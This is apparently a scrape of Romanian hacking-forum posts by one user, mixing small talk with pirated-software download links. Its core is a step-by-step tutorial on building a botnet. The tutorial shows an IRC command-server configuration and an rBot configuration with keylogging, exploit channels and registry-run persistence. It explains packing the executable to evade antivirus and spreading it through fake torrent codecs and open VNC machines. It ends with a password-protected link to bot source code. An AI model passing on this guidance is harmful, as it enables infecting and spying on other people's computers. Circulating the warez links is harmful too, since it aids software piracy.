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@cein zi asa ... u nu ai incercat macar o singura data ,un fum ? din orice. weed ? ceva ? @kw3 , bun bun Pall Mall rosu ,parca e cel mai tare ! -sub7
Poate a mai fost postat . . . Bafta Download : http://rapidshare.com/files/32421165/CSSH_sub7_rstzone.net.rar.html Password : rstzone.net
old, mersi oricum. FBI-u are alte "tools" -sub7
Cui ii mai place nicotina ca si mie , am inceput sa o iubesc acum 5 ani, si o tin tot asa, in fiecare zi un pachet de Marlboro ( pachetul tine 2 zile ) Voi ? -sub7
Favoritul meu : www.interfacelift.com
http://rapidshare.com/files/31504461/How_To_Steal_A_Mobile_Phone.zip frumoasa schema nu credeti ? -sub7
Vedeti cum computerul va zdrobeste, foarte interesant Merita vazut http://turbulence.org/spotlight/thinking/chess.html
Cum sa creezi Botnet Am scris la tutorialul asta 50 min, deci nu te astepta la mult Ei, multi incepatori doresc sa stie ce e Botnet si cum functioneaza,am scris un tutorial scurt pentru incepatorii RST. Iata si ce include : 1.De ce ai nevoie 2.Cum sa configurezi un (Ireal)ircd 3.Cum sa compilezi bot-ul 4.Fati exe-ul nedetectabil 5.Modalitati de al raspandi 1.De ce ai nevoie Sunt multe lucruri care te pot ajuta sa creezi un botnet. Aici am o lista cu necesitatiile botnet-ului, voi explica de ce e nevoie de ele. Visual Studio 6.0 http://rapidshare.com/files/18741766/Visual_Studio_6_Enterprice.Cruelintentionz.net.part01.rar.html [url]http://rapidshare.com/files/18742747/Visual_Studio_6_Enterprice.Cruelintentionz.net.part02.rar.htm[/url] [url]http://rapidshare.com/files/18743650/Visual_Studio_6_Enterprice.Cruelintentionz.net.part03.rar.html[/url] [url]http://rapidshare.com/files/18744550/Visual_Studio_6_Enterprice.Cruelintentionz.net.part04.rar.html[/url] [url]http://rapidshare.com/files/18745513/Visual_Studio_6_Enterprice.Cruelintentionz.net.part05.rar.html[/url] [url]http://rapidshare.com/files/18746464/Visual_Studio_6_Enterprice.Cruelintentionz.net.part06.rar.html[/url] [url]http://rapidshare.com/files/18747289/Visual_Studio_6_Enterprice.Cruelintentionz.net.part07.rar.html[/url] [url]http://rapidshare.com/files/18748172/Visual_Studio_6_Enterprice.Cruelintentionz.net.part08.rar.html[/url] [url]http://rapidshare.com/files/18749110/Visual_Studio_6_Enterprice.Cruelintentionz.net.part09.rar.html[/url] [url]http://rapidshare.com/files/18749945/Visual_Studio_6_Enterprice.Cruelintentionz.net.part10.rar.html[/url] [url]http://rapidshare.com/files/18750837/Visual_Studio_6_Enterprice.Cruelintentionz.net.part11.rar.html[/url] [url]http://rapidshare.com/files/18740879/Visual_Studio_6_Enterprice.Cruelintentionz.net.part12.rar.html[/url] Visual Studio 6.0 Service Pack 5 http://download.microsoft.com/download/vstudio60ent/SP5/Wideband-Full/WIN98Me/EN-US/vs6sp5.exe Visual Studio 6.0 Processor Pack http://download.microsoft.com/download/vb60ent/update/6/w9x2kxp/en-us/vcpp5.exe Core SDK http://www.microsoft.com/msdownload/platformsdk/sdkupdate/psdk-full.htm Daca habar nu ai cum sa le instalezi dai click aici : http://www.ryan1918.com/viewtopic.php?t=1509 Windows root-at ( Si linuxul este folositor, dar aici vorbesc despre windwos ) Irc Sursa bot-ului ( Eu am folosit rBot, gasesti botii in arhiva ) 2.Cum sa configurezi un (Ireal)irc Multe irc-uri sunt usor de configurat, in special cele cu mod. Deseori trebuie doar sa editezi numele, authost,irc port si admin user&password. Ce trebuie sa editam : open username-ales { // Editeaza "username-ales" cu userul dorit from { userhost "numeletau@*"; // Editeaza "numeletau" cu adresa de e-mail }; password "parola-ta-aleasa"; // Editeaza "parola-ta-aleasa" cu parola dorita class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; }; }; Editeaza flags de mai sus, daca doresti sa adaugi mai multi detinatori de irdc, copy & paste chestia me { name "QuakeNet"; info "QuakeNet"; numeric 1; }; Aici este numele serverului, numele poate fi "irc.QuakeNet.org", info este o informatie listen *:6667; Cu usurinta editeaza port-ul, la un port deschis, multe porturi 6500 -> 7000 sunt deschise. Cateva lucruri "extra" de editat hosts { local "QuakeNet"; global "QuakeNet"; coadmin "QuakeNet"; admin "QuakeNet"; servicesadmin "QuakeNet"; netadmin "QuakeNet"; host-on-open-up "yes"; }; }; Sethost-urile [email]sub7@local.quakenet.org[/email] / [email]sub7@global.quakenet.org[/email]. Pune "no" in host-on-open-up ( In loc de "yes" ) daca nu doresti auto-host. restrict-channelmodes "ntsuom"; modes-on-join "+Mustm"; Editeaza dupa preferintele tale,pentru a avea un canal securizat. Acum, salveaza configuratia.Arhiveaza si upload-eaza pe un host. Urmatorul pas, este sa deschizi un windows (VNC???) downloadezi fisierele si le ascunzi intr-un folder ascuns, ca C:\Windows\System32\ce_vrei_tu. Apoi porneste exe-ul care iti permite deschiderea ircd-ului, sau fisierul batch se afla deseori acolo in irc mod, vei vedea irc ruland. Nu uita sa pui o parola la VNC,ca nimeni sa nu iti prinda user-ul si parola, securizeaza toate porturile ca botnet-ul sa nu fie "Sniffed" , mirosit:P Urmeaza pasul 3. 3.Cum sa compilezi bot-ul rBot-ul e cel mai simplu de folosit Iata o configuratie, usoara : // configuratie bot (generic) - nu trebuie sa fie criptata int port = 6667; int port2 = 6667; int socks4port = 8001; int tftpport = 69; int httpport = 5465; int rloginport = 514; BOOL topiccmd = TRUE; BOOL rndfilename = FALSE; BOOL AutoStart = TRUE; char prefix = '.'; int maxrand = 8; int nicktype = CONSTNICK; BOOL nickprefix = FALSE; #ifdef DEBUG_LOGGING char logfile[]="%temp%\\yas.jpg"; #endif #ifndef NO_CRYPT #else char botid[] = "rx-asn-2-re-worked"; char version[] = "v2 by ovelayer"; char password[] = "yourpass"; char server[] = ""; char serverpass[] = ""; char channel[] = "#"; char chanpass[] = "";rd char server2[] = "" char channel2[] = "#"; char chanpass2[] = ""; char filename[] = "yourfile.exe"; char keylogfile[] = "keylog.xml"l char valuename[] = ""; char nickconst[] = "rBot|"; char szLocalPayloadFile[]="yourfile.exe"; char modeonconn[] = "-xi+B"; char exploitchan[] = "#*"; char keylogchan[] = "#*"; char psniffchan[] = "#*"; char *authost[] = { "yournick@" }; char *versionlist[] = { "mIRC v6.12 Khaled Mardam-Bey", }; char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"; char regkey3[]="Software\\Microsoft\\OLE"; char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa"; #endif #ifdef PLAIN_CRYPT char key[16] = "39lwmmqopma24ik1"; // Schimba ASTA! hmmm..Chiar am nevoie de aceasta ??? 1. Schimba port-ul de la irc, normal este 6667, daca ai altul schimba. 2. Schimba prefix-ul, normal este ".", asta trebuie sa folosesti inaintea comandei, ca: ".login parola". 3. Parola, schimb-o pentru a te loga ".login parolanecunoscuta". 4. Server-ul, add IP/DNS. 5. Parola serverului, probabil nu ai una,dar daca ai schimb-o ( EDIT ) 6. Canalul, editeaza canalul unde botii vor intra. 7. ChanPass, schimba sa fie mai sigur. 8. Nu adauga un al doilea server la rBot, deoarece nu va functiona. 9. Schimba "filename" pentru a nu fi detectat de vreun AV. 10.Fisierul in care PC-urile isi pun keylog-ul nu e necesar. 11.Value nume, deci daca exe-ul este numit nod32, atunci valuename = Nod32 AntiVirus sau asa ceva. 12.Nickconst este prefixul bot-ului, ca rBot|123456 13.Modul de conectare, lasa-l asa cum e. 14.Exploit channel, daca bot-ul se raspandeste va lasa un mesaj acolo. 15.Keylog si Psniff channel, va trimite mesaje pstore si keylog, dar PSNIFF nu functioneaza la rBot. 16.Autohost, poti seta autohostul ca sub7@*, asta va necesita sa ai nickname-ul ca toate hosturile, poti seta *@anonym0us.eu . 17.Lasa restul asa cum e. 4.Fati exe-ul nedetectabil Inainte sa incepi cu totul trebuie sa faci exe-ul securizat, exista packer-e, este greu sa faci rost de un bun packer in acest moment, dar poti folosi pe cele publice, care face ca exe-ul sa fie detectat de nod32, kaspersky ( companiile mari de antivirusi ). Fisierul tau trebuie sa fie mic pentru a se raspandi, dar si nedetectabil, altfel un AV il va detecta... 5.Modalitati de al raspandi Sunt multe cai de raspandire, ai nevoie de boti inainte de a incepe sa raspandesti exploituri via care sunt localizati in botii tai.Ex: il rogi pe un tip, sa downloadeze cu botii lui altii pe exe-ul tau, care iti permite sa pornesti un bnet, dar deasemenea ai nevoie de raspandire via torrent, doar creeaza un torrent cu film si exe-ul tau ( el fiind "codecul" sau ... ) sau scaneaza VNC-uri, infecteazale usor deschizand IE si exe ( STERGETI HISTORY ) Download surse si IRC KITTS : http://rapidshare.com/files/30408915/Botnet.rar.html Password : sub7@rstzone.net Info : http://en.wikipedia.org/wiki/Image:Zombie-process.png Bafta! -sub7
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Introduction to Design Patterns in C# Introduction to Design Patterns in C# PDF | 424 pages | 3 MB | English Design patterns are elegant, adaptable, and reusable solutions to everyday software development problems. Programmers use design patterns to organize objects in programs, making them easier to write and modify. C# Design Patterns: A Tutorial is a practical guide to writing C# programs using the most common patterns. This tutorial begins with clear and concise introductions to C#, object-oriented programming and inheritance, and UML diagrams. Each chapter that follows describes one of twenty-three design patterns, recommends when to use it, and explains the impact that it will have on the larger design. The use of every pattern is demonstrated with simple example programs. These programs are illustrated with screen shots and UML diagrams displaying how the classes interact. Each of these programs is available on the companion CD-ROM and can be run, examined, edited, and applied. Design patterns will have an immediate impact on your work as you learn the following: # Applying design patterns effectively in your day-to-day programming # Using patterns to create sophisticated, robust C# programs # The interaction of classes as demonstrated by UML diagrams # Advancing your programming skills using design patterns Design patterns will not only enhance your productivity, but once you see how quickly and easily object-oriented code can be recycled, they will become an everyday part of your C# programming. Download : http://rapidshare.com/files/26905347/Introduction_to_Design_Patterns_in_C_.rar
WinPatrol Plus ver.11.3.2007 WinPatrol works in two ways. First, when you install a program and it tries to add an icon to the tray at boot-up, you'll get a WinPatrol warning and a way to nip it in the bud (or kill and remove it afterward). That's important for programs such as AOL, Apple's QuickTime, and RealPlayer, all notorious for adding junk icons. WinPatrol also enables you to stop programs such as Adobe Acrobat that insist on running useless, daily version-update checks; and it prevents programs from changing file extensions willy-nilly. Scotty the Windows Watch Dog sniffs out malicious "mysteryware" and parasites that may assault your computer. WinPatrol puts you back in control of your computer so you'll know what programs are and should be running at all times. WinPatrol is a security tool that protect you from worms, trojan, cookies, adware, spyware. WinPatrol's goal is to help you better understand what programs are running on your computer, and alert you to any new programs added without your permission. Scotty lets you confirm any new programs set up to run on your computer. WinPatrol uses a heuristic approach to detecting attacks and violations of your computing environment. Traditional security programs scan your hard drive searching for previously identified threats. WinPatrol takes snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge. You'll be removing dangerous new programs while others download new reference files. Don't be surprised when you see programs not listed by typical Startup Program managers. WinPatrol has expanded the number of locations monitored to include many undocumented registry locations. Here are some key features of "WinPatrol":
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System Tools EF Duplicate Files Manager v4.20 The EF Duplicate Files Manager is a useful program that help you to find out and remove duplicate files with same name, same size, same content on specify paths, files that occupy so unnecessarily storage place on your computer or your server. You can let the program work in several ways. In the simplest case you let the program look for all files of same name. Or you give that only such files are to be specified in the result list, which exhibit additionally the same file size. If necessary, the EF Duplicate Files Manager can analyze even the file content. It indicates then only dupes, which are absolutely identical. How to install and use a packer plugin: - Download the desired module - Unzip the downloaded archive to any directory - Open the Options - Configuration dialog - Select the "Packer Plugins" page and add the new entry You can now use the plugin to search for duplicate files if use the Search in compressed files option. EF System Monitor v4.20 EF System Monitor Shows you comprehensive information about your local or remote (over TCP/IP) system resources and performances. R-Guard v2.2.982 R-Guard 2.2 is a reliable data security tool for advanced access right control, encryption and audit, which extends them much beyond the scope of the standard Windows security services. R-Guard enables the user to control access rights to various file systems objects (files and folders) not only for users, but for applications and system processes as well. R-Guard prevents data from disclosure, theft, modification, corruption, and deletion by another user or various malicious programs such as viruses, trojan horses, spyware, etc. R-Excel v1.2 R-Excel is a Microsoft Excel File Recovery Utility. R-Drive Image v4.0 R-Drive Image 4.0 is a potent utility providing disk image files creation for backup or duplication purposes. A disk image file contains the exact, byte-by-byte copy of a hard drive, partition or logical disk and can be created with various compression levels on the fly without stopping Windows OS and therefore without interrupting your business. These drive image files can then be stored in a variety of places, including various removable media such as CD-R(W)/DVD, Iomega Zip or Jazz disks, etc. R-Word v1.2 R-Word is a Microsoft Word Document Recovery Utility. R-TT introduces a NEW utility that recovers and reconstructs damaged Microsoft Word documents. A new IntelligentRebuild Word document recovery technology allows R-Word users to rebuild damaged *.doc files and easily restore lost MS Word documents. R-Wipe and Clean v7.1 R-Wipe & Clean is a complete solution to wipe useless files and keep your computer privacy. Irretrievably deletes private records of your on- and off-line activities, such as temporary internet files, history, cookies, autocomplete forms and passwords, swap files, recently opened documents list, Explorer MRUs, temporary files, etc., traces from more than 200 third-party applications, and free up your disk space. The utility wipes files and unused disk space using either fast or secure erase algorithms. All files and folders may be combined in wipe lists to erase them in a single procedure. Supports both the FAT and NTFS file systems. All separate wiping and cleaning tasks can be combined in one or more erasing procedures launched immediately or at predefined times or events as a background task. R-Mail v1.5 for Outlook & Outlook Express R-Mail is a family of email recovery utilities for damaged files and deleted messages created by Microsoft Outlook* (later referred to as "Outlook") and Microsoft Outlook Express* (later referred to as "Outlook Express") software. R-Mail utilities are based on the highly effective IntelligentRebuild Email recovery technology that allows R-Mail software users to repair damaged *.pst and *.dbx files and restore lost e-mail messages just in three steps. EF Mailbox Manager v4.10 EF Mailbox Manager can manage as many POP3 Accounts as you like. For periodical checking, polling time can be set individually for each account. You may check for new messages on a server and/ or delete messages on the server or download messages to a local computer for further use. EF Find v4.30 EF Find is a powerful search program for Windows 32 bit. Look for files, text, HEX sequences and regular expressions inside archives (7-Zip, ACE, ARC, ARJ, BZIP2, CAB, CPIO, GZIP, IMG, ISO (ISO9660), LHA, RAR, RPM, SFX, SQX, TAR, TBZ, TGZ, ZIP, ZOO). EF StartUp Manager v3.10 EF StartUp Manager Allows you a simple handling and complete control of applications which starts with Windows. The controlled starting mode makes it possible to start the programs in a defined order and optionaly specify a delay between them. EF Multi File Renamer v1.30 A versatile tool for comfortable renaming of numerous files. EF Process Manager v4.20 EF Process Manager Shows you comprehensive information about which modules processes have opened or loaded, register/unregister modules to registry database, show the environment variables or the Windows error codes, operations like kill process. Download : http://rapidshare.com/files/26859986/systools.exe
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